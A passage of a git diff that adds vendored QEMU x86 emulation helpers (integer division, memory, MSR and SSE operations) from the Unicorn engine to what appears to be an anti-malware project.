{ + return 1; + } + if (sa ^ sb) { + if (*plow > (1ULL << 63)) { + return 1; + } + *plow = 0-*plow; + } else { + if (*plow >= (1ULL << 63)) { + return 1; + } + } + if (sa) { + *phigh = 0-*phigh; + } + return 0; +} + +void helper_divq_EAX(CPUX86State *env, target_ulong t0) +{ + uint64_t r0, r1; + + if (t0 == 0) { + raise_exception(env, EXCP00_DIVZ); + } + r0 = env->regs[R_EAX]; + r1 = env->regs[R_EDX]; + if (div64(&r0, &r1, t0)) { + raise_exception(env, EXCP00_DIVZ); + } + env->regs[R_EAX] = r0; + env->regs[R_EDX] = r1; +} + +void helper_idivq_EAX(CPUX86State *env, target_ulong t0) +{ + uint64_t r0, r1; + + if (t0 == 0) { + raise_exception(env, EXCP00_DIVZ); + } + r0 = env->regs[R_EAX]; + r1 = env->regs[R_EDX]; + if (idiv64(&r0, &r1, t0)) { + raise_exception(env, EXCP00_DIVZ); + } + env->regs[R_EAX] = r0; + env->regs[R_EDX] = r1; +} +#endif + +#if TARGET_LONG_BITS == 32 +# define ctztl ctz32 +# define clztl clz32 +#else +# define ctztl ctz64 +# define clztl clz64 +#endif + +/* bit operations */ +target_ulong helper_ctz(target_ulong t0) +{ + return ctztl(t0); +} + +target_ulong helper_clz_x86(target_ulong t0) +{ + return clztl(t0); +} + +target_ulong helper_pdep(target_ulong src, target_ulong mask) +{ + target_ulong dest = 0; + int i, o; + + for (i = 0; mask != 0; i++) { + o = ctztl(mask); + mask &= mask - 1; + dest |= ((src >> i) & 1) << o; + } + return dest; +} + +target_ulong helper_pext(target_ulong src, target_ulong mask) +{ + target_ulong dest = 0; + int i, o; + + for (o = 0; mask != 0; o++) { + i = ctztl(mask); + mask &= mask - 1; + dest |= ((src >> i) & 1) << o; + } + return dest; +} + +#define SHIFT 0 +#include "shift_helper_template.h" +#undef SHIFT + +#define SHIFT 1 +#include "shift_helper_template.h" +#undef SHIFT + +#define SHIFT 2 +#include "shift_helper_template.h" +#undef SHIFT + +#ifdef TARGET_X86_64 +#define SHIFT 3 +#include "shift_helper_template.h" +#undef SHIFT +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/mem_helper.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/mem_helper.c new file mode 100644 index 0000000..f92c736 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/mem_helper.c @@ -0,0 +1,130 @@ +/* + * x86 memory access helpers + * + * Copyright (c) 2003 Fabrice Bellard + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . + */ + +#include "cpu.h" +#include "exec/helper-proto.h" +#include "exec/cpu_ldst.h" + +#include "uc_priv.h" + +/* broken thread support */ + +void helper_lock(CPUX86State *env) +{ +} + +void helper_unlock(CPUX86State *env) +{ +} + +void helper_cmpxchg8b(CPUX86State *env, target_ulong a0) +{ + uint64_t d; + int eflags; + + eflags = cpu_cc_compute_all(env, CC_OP); + d = cpu_ldq_data(env, a0); + if (d == (((uint64_t)env->regs[R_EDX] << 32) | (uint32_t)env->regs[R_EAX])) { + cpu_stq_data(env, a0, ((uint64_t)env->regs[R_ECX] << 32) | (uint32_t)env->regs[R_EBX]); + eflags |= CC_Z; + } else { + /* always do the store */ + cpu_stq_data(env, a0, d); + env->regs[R_EDX] = (uint32_t)(d >> 32); + env->regs[R_EAX] = (uint32_t)d; + eflags &= ~CC_Z; + } + CC_SRC = eflags; +} + +#ifdef TARGET_X86_64 +void helper_cmpxchg16b(CPUX86State *env, target_ulong a0) +{ + uint64_t d0, d1; + int eflags; + + if ((a0 & 0xf) != 0) { + raise_exception(env, EXCP0D_GPF); + } + eflags = cpu_cc_compute_all(env, CC_OP); + d0 = cpu_ldq_data(env, a0); + d1 = cpu_ldq_data(env, a0 + 8); + if (d0 == env->regs[R_EAX] && d1 == env->regs[R_EDX]) { + cpu_stq_data(env, a0, env->regs[R_EBX]); + cpu_stq_data(env, a0 + 8, env->regs[R_ECX]); + eflags |= CC_Z; + } else { + /* always do the store */ + cpu_stq_data(env, a0, d0); + cpu_stq_data(env, a0 + 8, d1); + env->regs[R_EDX] = d1; + env->regs[R_EAX] = d0; + eflags &= ~CC_Z; + } + CC_SRC = eflags; +} +#endif + +void helper_boundw(CPUX86State *env, target_ulong a0, int v) +{ + int low, high; + + low = cpu_ldsw_data(env, a0); + high = cpu_ldsw_data(env, a0 + 2); + v = (int16_t)v; + if (v < low || v > high) { + raise_exception(env, EXCP05_BOUND); + } +} + +void helper_boundl(CPUX86State *env, target_ulong a0, int v) +{ + int low, high; + + low = cpu_ldl_data(env, a0); + high = cpu_ldl_data(env, a0 + 4); + if (v < low || v > high) { + raise_exception(env, EXCP05_BOUND); + } +} + +#if !defined(CONFIG_USER_ONLY) +/* try to fill the TLB and return an exception if error. If retaddr is + * NULL, it means that the function was called in C code (i.e. not + * from generated code or from helper.c) + */ +/* XXX: fix it to restore all registers */ +void tlb_fill(CPUState *cs, target_ulong addr, int is_write, int mmu_idx, + uintptr_t retaddr) +{ + int ret; + + ret = x86_cpu_handle_mmu_fault(cs, addr, is_write, mmu_idx); + if (ret) { + X86CPU *cpu = X86_CPU(cs->uc, cs); + CPUX86State *env = &cpu->env; + + if (retaddr) { + /* now we have a real cpu fault */ + cpu_restore_state(cs, retaddr); + } + raise_exception_err(env, cs->exception_index, env->error_code); + } +} +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/misc_helper.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/misc_helper.c new file mode 100644 index 0000000..a3950b7 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/misc_helper.c @@ -0,0 +1,598 @@ +/* + * x86 misc helpers + * + * Copyright (c) 2003 Fabrice Bellard + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . + */ + +#include "cpu.h" +#include "exec/ioport.h" +#include "exec/helper-proto.h" +#include "exec/cpu_ldst.h" + +#include "uc_priv.h" + +void helper_outb(void *handle, uint32_t port, uint32_t data) +{ + cpu_outb(handle, port, data & 0xff); +} + +target_ulong helper_inb(void *handle, uint32_t port) +{ + return cpu_inb(handle, port); +} + +void helper_outw(void *handle, uint32_t port, uint32_t data) +{ + cpu_outw(handle, port, data & 0xffff); +} + +target_ulong helper_inw(void *handle, uint32_t port) +{ + return cpu_inw(handle, port); +} + +void helper_outl(void *handle, uint32_t port, uint32_t data) +{ + cpu_outl(handle, port, data); +} + +target_ulong helper_inl(void *handle, uint32_t port) +{ + return cpu_inl(handle, port); +} + +void helper_into(CPUX86State *env, int next_eip_addend) +{ + int eflags; + + eflags = cpu_cc_compute_all(env, CC_OP); + if (eflags & CC_O) { + raise_interrupt(env, EXCP04_INTO, 1, 0, next_eip_addend); + } +} + +void helper_single_step(CPUX86State *env) +{ +#ifndef CONFIG_USER_ONLY + check_hw_breakpoints(env, true); + env->dr[6] |= DR6_BS; +#endif + raise_exception(env, EXCP01_DB); +} + +void helper_cpuid(CPUX86State *env) +{ + uint32_t eax, ebx, ecx, edx; + + cpu_svm_check_intercept_param(env, SVM_EXIT_CPUID, 0); + + cpu_x86_cpuid(env, (uint32_t)env->regs[R_EAX], (uint32_t)env->regs[R_ECX], + &eax, &ebx, &ecx, &edx); + env->regs[R_EAX] = eax; + env->regs[R_EBX] = ebx; + env->regs[R_ECX] = ecx; + env->regs[R_EDX] = edx; +} + +#if defined(CONFIG_USER_ONLY) +target_ulong helper_read_crN(CPUX86State *env, int reg) +{ + return 0; +} + +void helper_write_crN(CPUX86State *env, int reg, target_ulong t0) +{ +} + +void helper_movl_drN_T0(CPUX86State *env, int reg, target_ulong t0) +{ +} +#else +target_ulong helper_read_crN(CPUX86State *env, int reg) +{ + target_ulong val; + + cpu_svm_check_intercept_param(env, SVM_EXIT_READ_CR0 + reg, 0); + switch (reg) { + default: + val = env->cr[reg]; + break; + case 8: + if (!(env->hflags2 & HF2_VINTR_MASK)) { + val = cpu_get_apic_tpr(env->uc, x86_env_get_cpu(env)->apic_state); + } else { + val = env->v_tpr; + } + break; + } + return val; +} + +void helper_write_crN(CPUX86State *env, int reg, target_ulong t0) +{ + cpu_svm_check_intercept_param(env, SVM_EXIT_WRITE_CR0 + reg, 0); + switch (reg) { + case 0: + cpu_x86_update_cr0(env, (uint32_t)t0); + break; + case 3: + cpu_x86_update_cr3(env, t0); + break; + case 4: + cpu_x86_update_cr4(env, (uint32_t)t0); + break; + case 8: + if (!(env->hflags2 & HF2_VINTR_MASK)) { + cpu_set_apic_tpr(env->uc, x86_env_get_cpu(env)->apic_state, (uint8_t)t0); + } + env->v_tpr = t0 & 0x0f; + break; + default: + env->cr[reg] = t0; + break; + } +} + +void helper_movl_drN_T0(CPUX86State *env, int reg, target_ulong t0) +{ + int i; + + if (reg < 4) { + hw_breakpoint_remove(env, reg); + env->dr[reg] = t0; + hw_breakpoint_insert(env, reg); + } else if (reg == 7) { + for (i = 0; i < DR7_MAX_BP; i++) { + hw_breakpoint_remove(env, i); + } + env->dr[7] = t0; + for (i = 0; i < DR7_MAX_BP; i++) { + hw_breakpoint_insert(env, i); + } + } else { + env->dr[reg] = t0; + } +} +#endif + +void helper_lmsw(CPUX86State *env, target_ulong t0) +{ + /* only 4 lower bits of CR0 are modified. PE cannot be set to zero + if already set to one. */ + t0 = (env->cr[0] & ~0xe) | (t0 & 0xf); + helper_write_crN(env, 0, t0); +} + +void helper_invlpg(CPUX86State *env, target_ulong addr) +{ + X86CPU *cpu = x86_env_get_cpu(env); + + cpu_svm_check_intercept_param(env, SVM_EXIT_INVLPG, 0); + tlb_flush_page(CPU(cpu), addr); +} + +void helper_rdtsc(CPUX86State *env) +{ + uint64_t val; + + if ((env->cr[4] & CR4_TSD_MASK) && ((env->hflags & HF_CPL_MASK) != 0)) { + raise_exception(env, EXCP0D_GPF); + } + cpu_svm_check_intercept_param(env, SVM_EXIT_RDTSC, 0); + + val = cpu_get_tsc(env) + env->tsc_offset; + env->regs[R_EAX] = (uint32_t)(val); + env->regs[R_EDX] = (uint32_t)(val >> 32); +} + +void helper_rdtscp(CPUX86State *env) +{ + helper_rdtsc(env); + env->regs[R_ECX] = (uint32_t)(env->tsc_aux); +} + +void helper_rdpmc(CPUX86State *env) +{ + if ((env->cr[4] & CR4_PCE_MASK) && ((env->hflags & HF_CPL_MASK) != 0)) { + raise_exception(env, EXCP0D_GPF); + } + cpu_svm_check_intercept_param(env, SVM_EXIT_RDPMC, 0); + + /* currently unimplemented */ + qemu_log_mask(LOG_UNIMP, "x86: unimplemented rdpmc\n"); + raise_exception_err(env, EXCP06_ILLOP, 0); +} + +#if defined(CONFIG_USER_ONLY) +void helper_wrmsr(CPUX86State *env) +{ +} + +void helper_rdmsr(CPUX86State *env) +{ +} +#else +void helper_wrmsr(CPUX86State *env) +{ + uint64_t val; + + cpu_svm_check_intercept_param(env, SVM_EXIT_MSR, 1); + + val = ((uint32_t)env->regs[R_EAX]) | + ((uint64_t)((uint32_t)env->regs[R_EDX]) << 32); + + switch ((uint32_t)env->regs[R_ECX]) { + case MSR_IA32_SYSENTER_CS: + env->sysenter_cs = val & 0xffff; + break; + case MSR_IA32_SYSENTER_ESP: + env->sysenter_esp = val; + break; + case MSR_IA32_SYSENTER_EIP: + env->sysenter_eip = val; + break; + case MSR_IA32_APICBASE: + cpu_set_apic_base(env->uc, x86_env_get_cpu(env)->apic_state, val); + break; + case MSR_EFER: + { + uint64_t update_mask; + + update_mask = 0; + if (env->features[FEAT_8000_0001_EDX] & CPUID_EXT2_SYSCALL) { + update_mask |= MSR_EFER_SCE; + } + if (env->features[FEAT_8000_0001_EDX] & CPUID_EXT2_LM) { + update_mask |= MSR_EFER_LME; + } + if (env->features[FEAT_8000_0001_EDX] & CPUID_EXT2_FFXSR) { + update_mask |= MSR_EFER_FFXSR; + } + if (env->features[FEAT_8000_0001_EDX] & CPUID_EXT2_NX) { + update_mask |= MSR_EFER_NXE; + } + if (env->features[FEAT_8000_0001_ECX] & CPUID_EXT3_SVM) { + update_mask |= MSR_EFER_SVME; + } + if (env->features[FEAT_8000_0001_EDX] & CPUID_EXT2_FFXSR) { + update_mask |= MSR_EFER_FFXSR; + } + cpu_load_efer(env, (env->efer & ~update_mask) | + (val & update_mask)); + } + break; + case MSR_STAR: + env->star = val; + break; + case MSR_PAT: + env->pat = val; + break; + case MSR_VM_HSAVE_PA: + env->vm_hsave = val; + break; +#ifdef TARGET_X86_64 + case MSR_LSTAR: + env->lstar = val; + break; + case MSR_CSTAR: + env->cstar = val; + break; + case MSR_FMASK: + env->fmask = val; + break; + case MSR_FSBASE: + env->segs[R_FS].base = val; + break; + case MSR_GSBASE: + env->segs[R_GS].base = val; + break; + case MSR_KERNELGSBASE: + env->kernelgsbase = val; + break; +#endif + case MSR_MTRRphysBase(0): + case MSR_MTRRphysBase(1): + case MSR_MTRRphysBase(2): + case MSR_MTRRphysBase(3): + case MSR_MTRRphysBase(4): + case MSR_MTRRphysBase(5): + case MSR_MTRRphysBase(6): + case MSR_MTRRphysBase(7): + env->mtrr_var[((uint32_t)env->regs[R_ECX] - + MSR_MTRRphysBase(0)) / 2].base = val; + break; + case MSR_MTRRphysMask(0): + case MSR_MTRRphysMask(1): + case MSR_MTRRphysMask(2): + case MSR_MTRRphysMask(3): + case MSR_MTRRphysMask(4): + case MSR_MTRRphysMask(5): + case MSR_MTRRphysMask(6): + case MSR_MTRRphysMask(7): + env->mtrr_var[((uint32_t)env->regs[R_ECX] - + MSR_MTRRphysMask(0)) / 2].mask = val; + break; + case MSR_MTRRfix64K_00000: + env->mtrr_fixed[(uint32_t)env->regs[R_ECX] - + MSR_MTRRfix64K_00000] = val; + break; + case MSR_MTRRfix16K_80000: + case MSR_MTRRfix16K_A0000: + env->mtrr_fixed[(uint32_t)env->regs[R_ECX] - + MSR_MTRRfix16K_80000 + 1] = val; + break; + case MSR_MTRRfix4K_C0000: + case MSR_MTRRfix4K_C8000: + case MSR_MTRRfix4K_D0000: + case MSR_MTRRfix4K_D8000: + case MSR_MTRRfix4K_E0000: + case MSR_MTRRfix4K_E8000: + case MSR_MTRRfix4K_F0000: + case MSR_MTRRfix4K_F8000: + env->mtrr_fixed[(uint32_t)env->regs[R_ECX] - + MSR_MTRRfix4K_C0000 + 3] = val; + break; + case MSR_MTRRdefType: + env->mtrr_deftype = val; + break; + case MSR_MCG_STATUS: + env->mcg_status = val; + break; + case MSR_MCG_CTL: + if ((env->mcg_cap & MCG_CTL_P) + && (val == 0 || val == ~(uint64_t)0)) { + env->mcg_ctl = val; + } + break; + case MSR_TSC_AUX: + env->tsc_aux = val; + break; + case MSR_IA32_MISC_ENABLE: + env->msr_ia32_misc_enable = val; + break; + default: + if ((uint32_t)env->regs[R_ECX] >= MSR_MC0_CTL + && (uint32_t)env->regs[R_ECX] < MSR_MC0_CTL + + (4 * env->mcg_cap & 0xff)) { + uint32_t offset = (uint32_t)env->regs[R_ECX] - MSR_MC0_CTL; + if ((offset & 0x3) != 0 + || (val == 0 || val == ~(uint64_t)0)) { + env->mce_banks[offset] = val; + } + break; + } + /* XXX: exception? */ + break; + } +} + +void helper_rdmsr(CPUX86State *env) +{ + uint64_t val; + + cpu_svm_check_intercept_param(env, SVM_EXIT_MSR, 0); + + switch ((uint32_t)env->regs[R_ECX]) { + case MSR_IA32_SYSENTER_CS: + val = env->sysenter_cs; + break; + case MSR_IA32_SYSENTER_ESP: + val = env->sysenter_esp; + break; + case MSR_IA32_SYSENTER_EIP: + val = env->sysenter_eip; + break; + case MSR_IA32_APICBASE: + val = cpu_get_apic_base(env->uc, x86_env_get_cpu(env)->apic_state); + break; + case MSR_EFER: + val = env->efer; + break; + case MSR_STAR: + val = env->star; + break; + case MSR_PAT: + val = env->pat; + break; + case MSR_VM_HSAVE_PA: + val = env->vm_hsave; + break; + case MSR_IA32_PERF_STATUS: + /* tsc_increment_by_tick */ + val = 1000ULL; + /* CPU multiplier */ + val |= (((uint64_t)4ULL) << 40); + break; +#ifdef TARGET_X86_64 + case MSR_LSTAR: + val = env->lstar; + break; + case MSR_CSTAR: + val = env->cstar; + break; + case MSR_FMASK: + val = env->fmask; + break; + case MSR_FSBASE: + val = env->segs[R_FS].base; + break; + case MSR_GSBASE: + val = env->segs[R_GS].base; + break; + case MSR_KERNELGSBASE: + val = env->kernelgsbase; + break; + case MSR_TSC_AUX: + val = env->tsc_aux; + break; +#endif + case MSR_MTRRphysBase(0): + case MSR_MTRRphysBase(1): + case MSR_MTRRphysBase(2): + case MSR_MTRRphysBase(3): + case MSR_MTRRphysBase(4): + case MSR_MTRRphysBase(5): + case MSR_MTRRphysBase(6): + case MSR_MTRRphysBase(7): + val = env->mtrr_var[((uint32_t)env->regs[R_ECX] - + MSR_MTRRphysBase(0)) / 2].base; + break; + case MSR_MTRRphysMask(0): + case MSR_MTRRphysMask(1): + case MSR_MTRRphysMask(2): + case MSR_MTRRphysMask(3): + case MSR_MTRRphysMask(4): + case MSR_MTRRphysMask(5): + case MSR_MTRRphysMask(6): + case MSR_MTRRphysMask(7): + val = env->mtrr_var[((uint32_t)env->regs[R_ECX] - + MSR_MTRRphysMask(0)) / 2].mask; + break; + case MSR_MTRRfix64K_00000: + val = env->mtrr_fixed[0]; + break; + case MSR_MTRRfix16K_80000: + case MSR_MTRRfix16K_A0000: + val = env->mtrr_fixed[(uint32_t)env->regs[R_ECX] - + MSR_MTRRfix16K_80000 + 1]; + break; + case MSR_MTRRfix4K_C0000: + case MSR_MTRRfix4K_C8000: + case MSR_MTRRfix4K_D0000: + case MSR_MTRRfix4K_D8000: + case MSR_MTRRfix4K_E0000: + case MSR_MTRRfix4K_E8000: + case MSR_MTRRfix4K_F0000: + case MSR_MTRRfix4K_F8000: + val = env->mtrr_fixed[(uint32_t)env->regs[R_ECX] - + MSR_MTRRfix4K_C0000 + 3]; + break; + case MSR_MTRRdefType: + val = env->mtrr_deftype; + break; + case MSR_MTRRcap: + if (env->features[FEAT_1_EDX] & CPUID_MTRR) { + val = MSR_MTRRcap_VCNT | MSR_MTRRcap_FIXRANGE_SUPPORT | + MSR_MTRRcap_WC_SUPPORTED; + } else { + /* XXX: exception? */ + val = 0; + } + break; + case MSR_MCG_CAP: + val = env->mcg_cap; + break; + case MSR_MCG_CTL: + if (env->mcg_cap & MCG_CTL_P) { + val = env->mcg_ctl; + } else { + val = 0; + } + break; + case MSR_MCG_STATUS: + val = env->mcg_status; + break; + case MSR_IA32_MISC_ENABLE: + val = env->msr_ia32_misc_enable; + break; + default: + if ((uint32_t)env->regs[R_ECX] >= MSR_MC0_CTL + && (uint32_t)env->regs[R_ECX] < MSR_MC0_CTL + + (4 * env->mcg_cap & 0xff)) { + uint32_t offset = (uint32_t)env->regs[R_ECX] - MSR_MC0_CTL; + val = env->mce_banks[offset]; + break; + } + /* XXX: exception? */ + val = 0; + break; + } + env->regs[R_EAX] = (uint32_t)(val); + env->regs[R_EDX] = (uint32_t)(val >> 32); +} +#endif + +static void do_pause(X86CPU *cpu) +{ + CPUState *cs = CPU(cpu); + + /* Just let another CPU run. */ + cs->exception_index = EXCP_INTERRUPT; + cpu_loop_exit(cs); +} + +static void do_hlt(X86CPU *cpu) +{ + CPUState *cs = CPU(cpu); + CPUX86State *env = &cpu->env; + + env->hflags &= ~HF_INHIBIT_IRQ_MASK; /* needed if sti is just before */ + cs->halted = 1; + cs->exception_index = EXCP_HLT; + cpu_loop_exit(cs); +} + +void helper_hlt(CPUX86State *env, int next_eip_addend) +{ + X86CPU *cpu = x86_env_get_cpu(env); + + cpu_svm_check_intercept_param(env, SVM_EXIT_HLT, 0); + env->eip += next_eip_addend; + + do_hlt(cpu); +} + +void helper_monitor(CPUX86State *env, target_ulong ptr) +{ + if ((uint32_t)env->regs[R_ECX] != 0) { + raise_exception(env, EXCP0D_GPF); + } + /* XXX: store address? */ + cpu_svm_check_intercept_param(env, SVM_EXIT_MONITOR, 0); +} + +void helper_mwait(CPUX86State *env, int next_eip_addend) +{ + X86CPU *cpu; + + if ((uint32_t)env->regs[R_ECX] != 0) { + raise_exception(env, EXCP0D_GPF); + } + cpu_svm_check_intercept_param(env, SVM_EXIT_MWAIT, 0); + env->eip += next_eip_addend; + + cpu = x86_env_get_cpu(env); + /* XXX: not complete but not completely erroneous */ + do_hlt(cpu); +} + +void helper_pause(CPUX86State *env, int next_eip_addend) +{ + X86CPU *cpu = x86_env_get_cpu(env); + + cpu_svm_check_intercept_param(env, SVM_EXIT_PAUSE, 0); + env->eip += next_eip_addend; + + do_pause(cpu); +} + +void helper_debug(CPUX86State *env) +{ + CPUState *cs = CPU(x86_env_get_cpu(env)); + + cs->exception_index = EXCP_DEBUG; + cpu_loop_exit(cs); +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/ops_sse.h b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/ops_sse.h new file mode 100644 index 0000000..8a8cda9 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/ops_sse.h @@ -0,0 +1,2335 @@ +/* + * MMX/3DNow!/SSE/SSE2/SSE3/SSSE3/SSE4/PNI support + * + * Copyright (c) 2005 Fabrice Bellard + * Copyright (c) 2008 Intel Corporation + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . + */ + +#include "qemu/aes.h" + +#if SHIFT == 0 +#define Reg MMXReg +#define XMM_ONLY(...) +#define B(n) MMX_B(n) +#define W(n) MMX_W(n) +#define L(n) MMX_L(n) +#define Q(n) q +#define SUFFIX _mmx +#else +#define Reg XMMReg +#define XMM_ONLY(...) __VA_ARGS__ +#define B(n) XMM_B(n) +#define W(n) XMM_W(n) +#define L(n) XMM_L(n) +#define Q(n) XMM_Q(n) +#define SUFFIX _xmm +#endif + +void glue(helper_psrlw, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) +{ + int shift; + + if (s->Q(0) > 15) { + d->Q(0) = 0; +#if SHIFT == 1 + d->Q(1) = 0; +#endif + } else { + shift = s->B(0); + d->W(0) >>= shift; + d->W(1) >>= shift; + d->W(2) >>= shift; + d->W(3) >>= shift; +#if SHIFT == 1 + d->W(4) >>= shift; + d->W(5) >>= shift; + d->W(6) >>= shift; + d->W(7) >>= shift; +#endif + } +} + +void glue(helper_psraw, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) +{ + int shift; + + if (s->Q(0) > 15) { + shift = 15; + } else { + shift = s->B(0); + } + d->W(0) = (int16_t)d->W(0) >> shift; + d->W(1) = (int16_t)d->W(1) >> shift; + d->W(2) = (int16_t)d->W(2) >> shift; + d->W(3) = (int16_t)d->W(3) >> shift; +#if SHIFT == 1 + d->W(4) = (int16_t)d->W(4) >> shift; + d->W(5) = (int16_t)d->W(5) >> shift; + d->W(6) = (int16_t)d->W(6) >> shift; + d->W(7) = (int16_t)d->W(7) >> shift; +#endif +} + +void glue(helper_psllw, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) +{ + int shift; + + if (s->Q(0) > 15) { + d->Q(0) = 0; +#if SHIFT == 1 + d->Q(1) = 0; +#endif + } else { + shift = s->B(0); + d->W(0) <<= shift; + d->W(1) <<= shift; + d->W(2) <<= shift; + d->W(3) <<= shift; +#if SHIFT == 1 + d->W(4) <<= shift; + d->W(5) <<= shift; + d->W(6) <<= shift; + d->W(7) <<= shift; +#endif + } +} + +void glue(helper_psrld, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) +{ + int shift; + + if (s->Q(0) > 31) { + d->Q(0) = 0; +#if SHIFT == 1 + d->Q(1) = 0; +#endif + } else { + shift = s->B(0); + d->L(0) >>= shift; + d->L(1) >>= shift; +#if SHIFT == 1 + d->L(2) >>= shift; + d->L(3) >>= shift; +#endif + } +} + +void glue(helper_psrad, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) +{ + int shift; + + if (s->Q(0) > 31) { + shift = 31; + } else { + shift = s->B(0); + } + d->L(0) = (int32_t)d->L(0) >> shift; + d->L(1) = (int32_t)d->L(1) >> shift; +#if SHIFT == 1 + d->L(2) = (int32_t)d->L(2) >> shift; + d->L(3) = (int32_t)d->L(3) >> shift; +#endif +} + +void glue(helper_pslld, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) +{ + int shift; + + if (s->Q(0) > 31) { + d->Q(0) = 0; +#if SHIFT == 1 + d->Q(1) = 0; +#endif + } else { + shift = s->B(0); + d->L(0) <<= shift; + d->L(1) <<= shift; +#if SHIFT == 1 + d->L(2) <<= shift; + d->L(3) <<= shift; +#endif + } +} + +void glue(helper_psrlq, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) +{ + int shift; + + if (s->Q(0) > 63) { + d->Q(0) = 0; +#if SHIFT == 1 + d->Q(1) = 0; +#endif + } else { + shift = s->B(0); + d->Q(0) >>= shift; +#if SHIFT == 1 + d->Q(1) >>= shift; +#endif + } +} + +void glue(helper_psllq, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) +{ + int shift; + + if (s->Q(0) > 63) { + d->Q(0) = 0; +#if SHIFT == 1 + d->Q(1) = 0; +#endif + } else { + shift = s->B(0); + d->Q(0) <<= shift; +#if SHIFT == 1 + d->Q(1) <<= shift; +#endif + } +} + +#if SHIFT == 1 +void glue(helper_psrldq, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) +{ + int shift, i; + + shift = s->L(0); + if (shift > 16) { + shift = 16; + } + for (i = 0; i < 16 - shift; i++) { + d->B(i) = d->B(i + shift); + } + for (i = 16 - shift; i < 16; i++) { + d->B(i) = 0; + } +} + +void glue(helper_pslldq, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) +{ + int shift, i; + + shift = s->L(0); + if (shift > 16) { + shift = 16; + } + for (i = 15; i >= shift; i--) { + d->B(i) = d->B(i - shift); + } + for (i = 0; i < shift; i++) { + d->B(i) = 0; + } +} +#endif + +#define SSE_HELPER_B(name, F) \ + void glue(name, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) \ + { \ + d->B(0) = F(d->B(0), s->B(0)); \ + d->B(1) = F(d->B(1), s->B(1)); \ + d->B(2) = F(d->B(2), s->B(2)); \ + d->B(3) = F(d->B(3), s->B(3)); \ + d->B(4) = F(d->B(4), s->B(4)); \ + d->B(5) = F(d->B(5), s->B(5)); \ + d->B(6) = F(d->B(6), s->B(6)); \ + d->B(7) = F(d->B(7), s->B(7)); \ + XMM_ONLY( \ + d->B(8) = F(d->B(8), s->B(8)); \ + d->B(9) = F(d->B(9), s->B(9)); \ + d->B(10) = F(d->B(10), s->B(10)); \ + d->B(11) = F(d->B(11), s->B(11)); \ + d->B(12) = F(d->B(12), s->B(12)); \ + d->B(13) = F(d->B(13), s->B(13)); \ + d->B(14) = F(d->B(14), s->B(14)); \ + d->B(15) = F(d->B(15), s->B(15)); \ + ) \ + } + +#define SSE_HELPER_W(name, F) \ + void glue(name, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) \ + { \ + d->W(0) = F(d->W(0), s->W(0)); \ + d->W(1) = F(d->W(1), s->W(1)); \ + d->W(2) = F(d->W(2), s->W(2)); \ + d->W(3) = F(d->W(3), s->W(3)); \ + XMM_ONLY( \ + d->W(4) = F(d->W(4), s->W(4)); \ + d->W(5) = F(d->W(5), s->W(5)); \ + d->W(6) = F(d->W(6), s->W(6)); \ + d->W(7) = F(d->W(7), s->W(7)); \ + ) \ + } + +#define SSE_HELPER_L(name, F) \ + void glue(name, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) \ + { \ + d->L(0) = F(d->L(0), s->L(0)); \ + d->L(1) = F(d->L(1), s->L(1)); \ + XMM_ONLY( \ + d->L(2) = F(d->L(2), s->L(2)); \ + d->L(3) = F(d->L(3), s->L(3)); \ + ) \ + } + +#define SSE_HELPER_Q(name, F) \ + void glue(name, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) \ + { \ + d->Q(0) = F(d->Q(0), s->Q(0)); \ + XMM_ONLY( \ + d->Q(1) = F(d->Q(1), s->Q(1)); \ + ) \ + } + +#if SHIFT == 0 +static inline int satub(int x) +{ + if (x < 0) { + return 0; + } else if (x > 255) { + return 255; + } else { + return x; + } +} + +static inline int satuw(int x) +{ + if (x < 0) { + return 0; + } else if (x > 65535) { + return 65535; + } else { + return x; + } +} + +static inline int satsb(int x) +{ + if (x < -128) { + return -128; + } else if (x > 127) { + return 127; + } else { + return x; + } +} + +static inline int satsw(int x) +{ + if (x < -32768) { + return -32768; + } else if (x > 32767) { + return 32767; + } else { + return x; + } +} + +#define FADD(a, b) ((a) + (b)) +#define FADDUB(a, b) satub((a) + (b)) +#define FADDUW(a, b) satuw((a) + (b)) +#define 